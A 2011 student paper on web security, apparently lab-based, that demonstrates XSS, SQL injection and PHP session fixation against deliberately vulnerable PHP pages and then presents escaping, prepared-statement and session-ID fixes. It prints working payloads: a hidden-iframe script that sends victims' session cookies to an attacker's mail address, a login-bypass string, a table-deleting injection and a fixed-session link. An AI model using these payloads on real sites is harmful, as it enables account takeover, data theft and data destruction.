Web System Hacking: XSS, SQL Injection and Session Fixation Attack

Contents: 0. Introduction (p.1)  1. The three attacks (p.2)  2. Experiments (p.3)  3. Countermeasures (p.8)  4. Discussion (p.10)
(Typesetting note from the original: body text in Century, program listings in Courier New.)

0. Introduction

[Only fragments of the introduction survived extraction.] It starts from the CUI (Character User Interface) era and cites the vulnerability statistics published by IPA in 2011. The history of the Web is traced from ARPANET, which in 1969 connected UCLA and SRI, through the 1990s (Microsoft Windows 95) to today's Web built on HTTP (HyperText Transfer Protocol) and on server-side programs written in PHP, JavaScript, CGI and Perl.
1. The three attacks

1.1 XSS (Cross Site Scripting). A Web page that copies user input into its HTML without escaping lets an attacker inject script. The input may arrive through an HTML <form> submitted by POST, or be planted on a page the victim visits through an <iframe>; the injected JavaScript then runs in the victim's browser with the victim's cookies.

1.2 SQL Injection. The Web application builds an SQL statement by concatenating user input, for example

    INSERT INTO table VALUE ($_POST['name']);

so that whatever is sent as name becomes part of the SQL the database executes.

1.3 SF (Session Fixation Attack). PHP identifies a session by one session ID (SID). If the attacker can make the victim use an ID the attacker chose, the attacker knows the victim's ID after the victim logs in and can take over the session without guessing or stealing anything.
2. Experiments

2.1 Environment
    Host: iMac (mid 2009), Intel Core 2 Duo 2.93 GHz, 8 GB RAM, VMware Fusion 3.0
    Guest OS: Ubuntu 11.04, 2 GB RAM
    Apache HTTP Server 2.0, Oracle MySQL 5.5.14, Postfix 2.7.2, PHP 5.3, Vim 7.3

2.2 XSS, first experiment

SOURCE1: FIRST XSS
/xss/1/001.html
    <html>
    <head><title>xss1</title></head>
    <body>
    <form action="002.php" method="post">
    name:<input type="text" name="id"><br>
    <input type="submit" value="send">
    </form></body></html>

/xss/1/002.php
    <html>
    <head><title>xss1</title></head>
    <body>
    <?php echo 'done:' . $_POST['id']; ?>
    </body></html>

Typing Tehu into the name field and pressing send produces the page "done: Tehu". Typing the JavaScript

    <script>alert(document.title);</script>

instead produces an alert box showing the page title, xss1, and the page body reads only "done:", because the browser executed the script rather than displaying it. 002.php does not distinguish text from HTML: whatever was sent as id is delivered to the browser as part of the page. With

    <script>document.write(document.title);</script>

the page reads "done: xss1": the script's output is written into the document.
2.3 XSS, stealing the cookie

A Cookie is data the Web server stores in the browser and the browser sends back with every request; it typically carries the user's login ID and session ID. JavaScript on the page can read it as document.cookie, so the payload

    <script>alert(document.cookie);</script>

displays the victim's cookie. In a real attack the XSS is delivered through a GET parameter rather than by the victim filling in a POST form, and the cookie is sent to the attacker instead of being displayed.

SOURCE2: REAL XSS
/xss/2/001.php
    <?php session_start(); ?>
    Keyword: <?php echo $_GET['id']; ?>
    </body>

session_start() creates a PHP session and its session ID, which is passed to the browser in a Cookie (or in the URL). Requesting

    /xss/2/001.php?id=<script>alert(document.cookie);</script>

pops up the cookie, PHPSESSID=64vis21ftdhjke5r1ba5sdgh... (the session ID). An attacker who obtains this ID can present it and be treated as the victim. To deliver the payload the attacker prepares a page with an <iframe>:

/xss/2/900.html
    <html>secret virgin<br><br>
    <iframe width=320 height=100
      src="001.php?id=<script>window.location='901.php?id='%2Bdocument.cookie;</script>">
    </iframe></body></html>

/xss/2/901.php
    <?php
    mb_language('Japanese');
    mb_send_mail('hack@tehu.me', 'result', 'cookie:' . $_GET['id'], 'From: cracked@tehu.me');
    ?>
    attack was succeed!</body>

The victim opens 900.html. Its iframe loads 001.php with the JavaScript payload, which runs and redirects the iframe to 901.php with document.cookie appended to the URL (%2B is the URL encoding of +). 901.php mails the cookie to the attacker. Because 001.php calls session_start(), the cookie the victim sends contains the session ID, and whatever else the site keeps in the cookie (login ID, etc.) is delivered with it.
On a real SNS the attacker would post 900.html as an innocent-looking page ("Secret virgin"); with width=320 and height=100 the iframe visibly shows "attack was succeed!", but with width=0 height=0 the victim notices nothing.

2.4 SQL Injection, first experiment

On Oracle MySQL a database hack with an InnoDB table ikimono was prepared.

DATABASE1: hack/ikimono
    id  name              birth
    --  ----------------  -----
    1   Yoshiki Mizuno    1982
    2   Kiyoe Yoshioka    1984
    3   Hotaka Yamashita  1982

SOURCE3: FIRST INJECTION
/sql/1/001.php
    <?php
    $url  = 'localhost';
    $user = 'root';
    $pass = 'tehutehu';
    $db   = 'hack';
    $sql  = 'SELECT * FROM ikimono WHERE birth=' . $_GET['year'];
    $link = mysql_connect($url, $user, $pass) or die("died");
    $sdb  = mysql_select_db($db, $link) or die("failed to select");
    mysql_query("set names utf8");
    $result = mysql_query($sql, $link) or die("failed to query");
    mysql_close($link) or die("bad cl");
    while ($row = mysql_fetch_assoc($result)) {
        echo 'id:' . $row['id'] . ' name:' . $row['name'] . '<br>';
    }
    ?>

The year is given in the URL:

    /sql/1/001.php?year=1982
    id:1 name:Yoshiki Mizuno
    id:3 name:Hotaka Yamashita

year=1984 returns Kiyoe Yoshioka and year=2011 returns nothing. Line 6 of 001.php builds the SQL as

    SELECT * FROM ikimono WHERE birth=

followed by the raw parameter, so the parameter can terminate the statement and start another:

    year=0;DELETE FROM ikimono

DATABASE1: hack/ikimono (hacked)
    id  name  birth
    --  ----  -----
    Warning: this table doesn't have any records!

(Caveat: PHP's mysql_query() sends a single statement and rejects stacked queries, so with the listing exactly as above the DELETE is refused with "failed to query"; the deletion needs a driver that accepts multiple statements, while a payload that stays inside one statement, such as year=0 OR 1=1, returns every row. Either way the parameter controls the statement, which is the point.)
2.5 SQL Injection, bypassing a login

The same technique defeats a Web login. Table login holds user names and passwords:

DATABASE2: hack/login
    id  name   pass
    --  -----  --------
    1   tehu   tehutehu
    2   kinta  tanki
    3   kiyoe  hotaka

SOURCE4: REAL INJECTION
/sql/2/001.html
    <html>
    <head><title>sql</title></head>
    <body>
    <form action="002.php" method="post">
    name:<input type="text" name="id"><br>
    pass:<input type="text" name="pw"><br>
    <input type="submit" value="send">
    </form></body></html>

/sql/2/002.php
    <?php
    $id   = $_POST['id'];
    $pw   = $_POST['pw'];
    $url  = 'localhost';
    $user = 'root';
    $pass = 'tehutehu';
    $db   = 'hack';
    $sql  = "SELECT * FROM login WHERE name='" . $id . "' AND pass='" . $pw . "'";
    $link = mysql_connect($url, $user, $pass) or die("died");
    $sdb  = mysql_select_db($db, $link) or die("failed to select");
    mysql_query("set names utf8");
    $result = mysql_query($sql, $link) or die("failed to query");
    mysql_close($link) or die("bad cl");
    if ($row = mysql_fetch_assoc($result)) {
        echo 'process was done!';
    } else {
        echo 'authentication was denied!';
    }
    ?>

Entering name kinta and pass tanki prints "process was done!"; name tehu and pass debu prints "authentication was denied!". 002.php pastes id and pw into the SQL between single quotes, so entering name tehu and the password

    ' OR 'a'='a

prints "process was done!" although no valid password was given. The executed SQL is

    SELECT * FROM login WHERE name='tehu' AND pass='' OR 'a'='a'

The condition 'a'='a' is always true, so the OR makes the whole WHERE clause true regardless of name and pass, and a row is returned.
The password check is thus bypassed without knowing any password.

2.6 Session hijacking and session fixation

XSS and SQL injection attack the Web application itself; session hijacking attacks the user's session. There are three ways to obtain a session ID.

1) Guessing the ID. If the ID is derived from something predictable such as UNIX time, an attacker can guess it (PICT1: SESSION ID HACKS, figure not recoverable). On Linux the ID can be generated from /dev/urandom, which makes it unguessable.
2) Stealing the ID. The cookie can be read out by XSS as in 2.3; an SID carried in the URL leaks through the HTTP Referer header when the user follows a link to another site.
3) Fixing the ID. The attacker does not learn the victim's ID at all but makes the victim use an ID the attacker already knows. This is session fixation.

SOURCE5: SESSION FIXATION
/sid/1/.htaccess
    php_flag session.use_cookies On
    php_flag session.use_only_cookies Off
    php_flag session.use_trans_sid On

/sid/1/001.php
    <?php session_start(); ?>
    <form action="002.php" method="POST">
    ID:<input name="id" type="text"><br>
    <input type="submit" value="Login">
    </form></body>

/sid/1/002.php
    <?php
    session_start();
    $id = $_POST['id'];
    $_SESSION['id'] = $id;
    ?>
    Hello, Mr/Mrs. <?php echo $id; ?>!<br>
    <a href="003.php">Your Info</a>
    </body>
/sid/1/003.php
    <?php session_start(); ?>
    Your Info<br>
    ID: <?php echo $_SESSION['id']; ?>
    </body>

The .htaccess makes PHP accept the session ID from the URL (use_trans_sid On, use_only_cookies Off) and then carry it in the cookie (use_cookies On). 001.php shows the login form, 002.php stores the submitted ID in the session, and 003.php displays it. PHPSESSID is the default name under which PHP passes the session ID.

The attack: the attacker (here Satoru Cho, using sendmail on the server) mails the victim a URL containing a session ID he chose, 123:

    http://example.jp/sid/1/003.php?PHPSESSID=123

The victim follows the link and logs in. PHP adopts 123 as the victim's session ID and stores the victim's ID in that session. The attacker now requests 003.php with PHPSESSID=123 and is shown the victim's ID, having neither guessed nor stolen it. The precondition is the .htaccess configuration that lets the ID come from the URL instead of only from the cookie.

3. Countermeasures

3.1 XSS. The attack in 2.3 worked because the JavaScript

    <script>window.location='901.php?id='%2Bdocument.cookie;</script>

was written into the page as HTML. The fix is to escape the output so that the browser shows it as text.
PHP provides

    htmlspecialchars($p, ENT_QUOTES, 'UTF-8');

which converts the five characters that have meaning in HTML into entities (ENT_QUOTES makes it cover both quote characters):

    <   &lt;
    >   &gt;
    &   &amp;
    "   &quot;
    '   &#039;

The payload becomes

    &lt;script&gt;window.location=&#039;901.php?id=&#039;%2Bdocument.cookie;&lt;/script&gt;

which the browser renders as literal text.

SOURCE6: REAL XSS (VER.2)
/xss/2/001.php
    <?php session_start(); ?>
    Keyword: <?php echo htmlspecialchars($_GET['id'], ENT_QUOTES, 'UTF-8'); ?>
    </body>

With this version 900.html no longer obtains the ID: the script in the iframe is displayed, not executed.

3.2 SQL Injection. XSS injects JavaScript into HTML; SQL injection injects SQL into an SQL statement, and the counterpart of htmlspecialchars() is

    addslashes($p);

which puts a backslash before each quote, so that ' OR 'a'='a becomes

    \' OR \'a\'=\'a

and the quote no longer terminates the string inside the SQL.

SOURCE7: REAL INJECTION (VER.2)
/sql/2/002.php
    <?php
    $id   = addslashes($_POST['id']);
    $pw   = addslashes($_POST['pw']);
    $url  = 'localhost';
    $user = 'root';
    $pass = 'tehutehu';
    $db   = 'hack';
    $sql  = "SELECT * FROM login WHERE name='" . $id . "' AND pass='" . $pw . "'";
    $link = mysql_connect($url, $user, $pass) or die("died");
    $sdb  = mysql_select_db($db, $link) or die("failed to select");
    mysql_query("set names utf8");
    $result = mysql_query($sql, $link) or die("failed to query");
    mysql_close($link) or die("bad cl");
    if ($row = mysql_fetch_assoc($result)) {
        echo 'process was done!';
    } else {
        echo 'authentication was denied!';
    }
    ?>

Both inputs are escaped: escaping pass alone leaves name open to the same injection.

3.3 Session fixation. The attack in 2.6 relied on PHP accepting the ID from the URL. The .htaccess is changed so that the ID is taken from the cookie only:

SOURCE8: SESSION FIXATION (VER.2)
/sid/1/.htaccess
    php_flag session.use_cookies On
    php_flag session.use_only_cookies On
    php_flag session.use_trans_sid Off

With session.use_only_cookies On a PHPSESSID in the URL is ignored, and with use_trans_sid Off PHP stops appending the ID to links and forms. session.use_cookies must stay On: with all three flags Off, PHP would have no way to carry the ID at all.
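Returning to 3.1: the following is an added example, not code from the paper, that reproduces in Python what SOURCE6's htmlspecialchars() does to the cookie-stealing payload, and checks two limits of it that a practitioner should know. The payload is the one from 900.html (URL-decoded); the <img onerror> vector, the javascript: URL, the keyword filter and the helper names (keyword_page, safe_href, still_executes) are constructed here for the demonstration.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Payload from the paper's 900.html, URL-decoded (%2B is '+').
COOKIE_THEFT = "<script>window.location='901.php?id='+document.cookie;</script>"
# Constructed extra vectors: an event handler (no 'script' keyword) and a javascript: URL.
IMG_ONERROR = "<img src=x onerror=alert(document.cookie)>"
JS_URL = "javascript:alert(document.title)"


def htmlspecialchars(s: str) -> str:
    """Equivalent of PHP htmlspecialchars($s, ENT_QUOTES, 'UTF-8'):
    & < > " and ' become entities (Python writes ' as &#x27;, PHP as &#039;)."""
    return html.escape(s, quote=True)


def keyword_page(keyword: str) -> str:
    """Hardened /xss/2/001.php: the keyword is reflected as text, never as markup."""
    return "Keyword: " + htmlspecialchars(keyword)


def keyword_filter(s: str) -> str:
    """A blacklist filter that rewrites 'script' to 'xscript' instead of escaping."""
    return re.sub(r"script", "xscript", s, flags=re.IGNORECASE)


# <script ...>, an on*= handler inside a tag, or a javascript: URL still run in a browser.
ACTIVE_RE = re.compile(r"<script|<\w+[^>]*\bon\w+\s*=|javascript:", re.IGNORECASE)


def still_executes(fragment: str) -> bool:
    """Rough check whether a fragment placed into HTML would still run script."""
    return ACTIVE_RE.search(fragment) is not None


def safe_href(url: str) -> Optional[str]:
    """Escaping does nothing for input placed in an href: javascript:alert(1) contains
    none of the five characters. Only http(s) URLs are accepted; anything else is rejected."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return None
    return htmlspecialchars(url)
```

keyword_page() neutralises both the cookie-theft payload and the onerror vector, because every "<" becomes "&lt;". The keyword filter stops <script> and turns javascript: into javaxscript:, exactly as the paper describes, but passes the onerror vector untouched. And htmlspecialchars() returns the javascript: URL unchanged, so a URL attribute needs scheme validation (safe_href) in addition to escaping.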
4. Discussion

4.1 Limits of the XSS countermeasure. htmlspecialchars() neutralises the five characters, but JavaScript can be executed without any of them. If user input is placed into a URL attribute, the javascript: scheme runs code:

    javascript:alert(document.title)

Searching Google turns up many more such vectors. Filtering the keyword instead of escaping, for instance rewriting script to xscript (s/script/xscript/), turns <script> into <xscript> and javascript: into javaxscript:, but it does not cover vectors that never contain the word, nor browser-specific ones such as Internet Explorer's CSS expression(), which evaluates JavaScript inside a style sheet. What is needed is escaping for the context in which the data is output, plus restricting what is accepted, not a blacklist.

4.2 Limits of the SQL Injection countermeasure. addslashes() only protects values that stand inside quotes. Moreover, the attacker is not limited to what the form offers: GET parameters are edited in the URL, and POST bodies can be modified with a proxy such as Fiddler (Microsoft) or typed by hand over Telnet, so an HTML <input> value the page treats as fixed is still attacker-controlled. Numeric parameters should therefore be forced to numbers, with intval() or a check such as

    preg_match('/\d+/', $subject);

The pattern must be anchored, /^\d+$/, to reject "1982 OR 1=1": unanchored /\d+/ matches any string that contains a digit.
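The following is an added example, not code from the paper, that replays the injections of 2.4 and 2.5 against an in-memory SQLite copy of DATABASE1 and DATABASE2 and compares the three treatments discussed in 3.2 and 4.2: plain concatenation, quote escaping, and validated or bound parameters. SQLite is used so the example runs offline; it escapes a quote by doubling it rather than with a backslash as addslashes() does on MySQL, but the role is the same. The table contents are the paper's; the function names and the extra payloads (' OR 1=1 OR 'a'='a, 1982 OR 1=1) are constructed here.

```python
import re
import sqlite3
from typing import List, Optional


def make_db() -> sqlite3.Connection:
    """In-memory copy of DATABASE1 (hack/ikimono) and DATABASE2 (hack/login)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE ikimono (id INTEGER PRIMARY KEY, name TEXT, birth INTEGER);
        INSERT INTO ikimono VALUES (1, 'Yoshiki Mizuno', 1982),
                                   (2, 'Kiyoe Yoshioka', 1984),
                                   (3, 'Hotaka Yamashita', 1982);
        CREATE TABLE login (id INTEGER PRIMARY KEY, name TEXT, pass TEXT);
        INSERT INTO login VALUES (1, 'tehu', 'tehutehu'),
                                 (2, 'kinta', 'tanki'),
                                 (3, 'kiyoe', 'hotaka');
    """)
    return con


def escape_quotes(s: str) -> str:
    """Escaping for a quoted string (SQLite doubles the quote; addslashes() on MySQL
    plays the same role with a backslash)."""
    return s.replace("'", "''")


def login_concat(con: sqlite3.Connection, name: str, pw: str) -> bool:
    """SOURCE4: both inputs pasted between quotes."""
    sql = "SELECT * FROM login WHERE name='" + name + "' AND pass='" + pw + "'"
    return con.execute(sql).fetchone() is not None


def login_escape_pw_only(con: sqlite3.Connection, name: str, pw: str) -> bool:
    """Escaping only the password leaves name injectable."""
    sql = "SELECT * FROM login WHERE name='" + name + "' AND pass='" + escape_quotes(pw) + "'"
    return con.execute(sql).fetchone() is not None


def login_param(con: sqlite3.Connection, name: str, pw: str) -> bool:
    """Prepared statement: the values are bound and never parsed as SQL."""
    row = con.execute("SELECT * FROM login WHERE name=? AND pass=?", (name, pw)).fetchone()
    return row is not None


def birth_concat(con: sqlite3.Connection, year: str) -> List[str]:
    """SOURCE3: numeric context with no quotes, so quote escaping cannot help."""
    return [r[0] for r in con.execute("SELECT name FROM ikimono WHERE birth=" + year)]


YEAR_RE = re.compile(r"\d+")


def validate_year(year: str) -> Optional[int]:
    """Anchored form of preg_match('/\\d+/'): the whole parameter must be digits."""
    return int(year) if YEAR_RE.fullmatch(year) else None


def birth_param(con: sqlite3.Connection, year: str) -> List[str]:
    """Validated integer bound to a placeholder; non-numeric input yields no rows."""
    y = validate_year(year)
    if y is None:
        return []
    return [r[0] for r in con.execute("SELECT name FROM ikimono WHERE birth=?", (y,))]


def stacked_attempt(con: sqlite3.Connection, year: str) -> Optional[int]:
    """year=0;DELETE FROM ikimono through execute(): like PHP's mysql_query(), sqlite3
    runs one statement per call and rejects the second. Returns rows left, None if rejected."""
    try:
        con.execute("SELECT name FROM ikimono WHERE birth=" + year).fetchall()
    except Exception:  # sqlite3.Warning (Python <= 3.11) or ProgrammingError (3.12+)
        return None
    return con.execute("SELECT COUNT(*) FROM ikimono").fetchone()[0]


def stacked_executescript(con: sqlite3.Connection, year: str) -> int:
    """Same payload on an API that accepts several statements: the DELETE runs. Returns rows left."""
    con.executescript("SELECT name FROM ikimono WHERE birth=" + year)
    return con.execute("SELECT COUNT(*) FROM ikimono").fetchone()[0]
```

The login results match 2.5: kinta/tanki succeeds, tehu/debu fails, and tehu with ' OR 'a'='a succeeds against the concatenated query. Escaping the password blocks that, but ' OR 1=1 OR 'a'='a in the name field still logs in, and in the unquoted birth query 1982 OR 1=1 returns every row while YEAR_RE.search() would happily accept it. The bound-parameter versions reject all of these. The stacked payload is refused by execute() and empties the table through executescript(), the difference the caveat in 2.4 refers to.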
With such a numeric check the statement

    SELECT * FROM table WHERE id=

can only be completed by an integer such as 123456:

    SELECT * FROM table WHERE id=123456

and nothing else can be injected. The general solution is the prepared statement: the SQL is sent with placeholders,

    SELECT * FROM table WHERE id = ?

and the values are bound separately. Since a bound value is never parsed as SQL, injection into that statement is prevented completely (the paper puts it at 100%; what placeholders cannot cover are structural parts such as table or column names, which must still be checked against a fixed list).

4.3 Limits of the session fixation countermeasure. Taking the ID only from the cookie stops the URL variant, but the cookie itself can still be stolen (2.3) or leaked (the passage on Internet Explorer 6 and the HTTP Referer header is not recoverable). A fixed ID should also be invalidated at login:

    session_regenerate_id(true);

issues a fresh ID and deletes the old one, so an ID the attacker planted before login is useless afterwards. Finally, a Token kept in the session on the Cookie side and embedded in each form, then compared on submission, ensures that a request originated from the application's own page and was not forged from elsewhere.
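The following is an added example, not code from the paper, that models the session handling of SOURCE5 and the two fixes from 3.3 and 4.3 in a small Python class: use_only_cookies=False corresponds to the original .htaccess (ID also accepted from the URL), use_only_cookies=True to SOURCE8, and regenerate_on_login models session_regenerate_id(true) being called in 002.php. The fixed ID 123 and the page behaviour are the paper's; the class, its method names and the request/response records are constructed here.

```python
import secrets
from dataclasses import dataclass, field
from typing import Dict


@dataclass
class Request:
    cookies: Dict[str, str] = field(default_factory=dict)
    query: Dict[str, str] = field(default_factory=dict)
    post: Dict[str, str] = field(default_factory=dict)


@dataclass
class Response:
    body: str = ""
    set_cookie: Dict[str, str] = field(default_factory=dict)


class SessionServer:
    """Toy model of PHP sessions behind /sid/1/002.php and 003.php.
    use_only_cookies=False is SOURCE5 (session.use_only_cookies Off: ID also taken from
    the URL); regenerate_on_login models session_regenerate_id(true) in 002.php."""

    def __init__(self, use_only_cookies: bool, regenerate_on_login: bool) -> None:
        self.use_only_cookies = use_only_cookies
        self.regenerate_on_login = regenerate_on_login
        self.store: Dict[str, Dict[str, str]] = {}

    def session_start(self, req: Request, resp: Response) -> str:
        sid = req.cookies.get("PHPSESSID")
        if sid is None and not self.use_only_cookies:
            sid = req.query.get("PHPSESSID") or req.post.get("PHPSESSID")
        if sid is None:
            sid = secrets.token_hex(16)
        self.store.setdefault(sid, {})  # an unknown ID simply starts an empty session
        resp.set_cookie["PHPSESSID"] = sid
        return sid

    def page_002_login(self, req: Request) -> Response:
        resp = Response()
        sid = self.session_start(req, resp)
        if self.regenerate_on_login:  # session_regenerate_id(true): new ID, old one deleted
            data = self.store.pop(sid)
            sid = secrets.token_hex(16)
            self.store[sid] = data
            resp.set_cookie["PHPSESSID"] = sid
        self.store[sid]["id"] = req.post["id"]
        resp.body = "Hello, Mr/Mrs. " + req.post["id"] + "!"
        return resp

    def page_003_info(self, req: Request) -> Response:
        resp = Response()
        sid = self.session_start(req, resp)
        resp.body = "ID: " + self.store[sid].get("id", "")
        return resp


def fixation_attack(server: SessionServer, fixed_sid: str = "123") -> str:
    """The victim logs in through the attacker's link carrying PHPSESSID=fixed_sid;
    the attacker then opens 003.php with that ID. Returns the body the attacker sees."""
    server.page_002_login(Request(query={"PHPSESSID": fixed_sid}, post={"id": "victim"}))
    attacker = Request(cookies={"PHPSESSID": fixed_sid}, query={"PHPSESSID": fixed_sid})
    return server.page_003_info(attacker).body


def legitimate_flow(server: SessionServer) -> str:
    """Normal use: log in, then open 003.php with the cookie the server set."""
    login = server.page_002_login(Request(post={"id": "tehu"}))
    return server.page_003_info(Request(cookies=dict(login.set_cookie))).body
```

Under the SOURCE5 configuration the attacker's request with PHPSESSID=123 returns "ID: victim". With cookies only, the 123 in the victim's URL is ignored and the attacker's 123 is an empty session; with regeneration at login the planted ID is discarded even if the attacker managed to set it as a cookie. Legitimate users are unaffected in every configuration.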
References

Web application security (2011). [Title only partially recoverable.]
GIJOE (2005). PHP. [Title only partially recoverable.]
Studying HTTP. <http://www.studyinghttp.net/> (accessed 2011-08-04)
XSS Challenges. <http://xss-quiz.int21h.jp/> (accessed 2011-08-04)
IPA. <http://www.ipa.go.jp/security/vuln/> (accessed 2011-08-04)

Copyright 2011 Sei Cho, All Rights Reserved.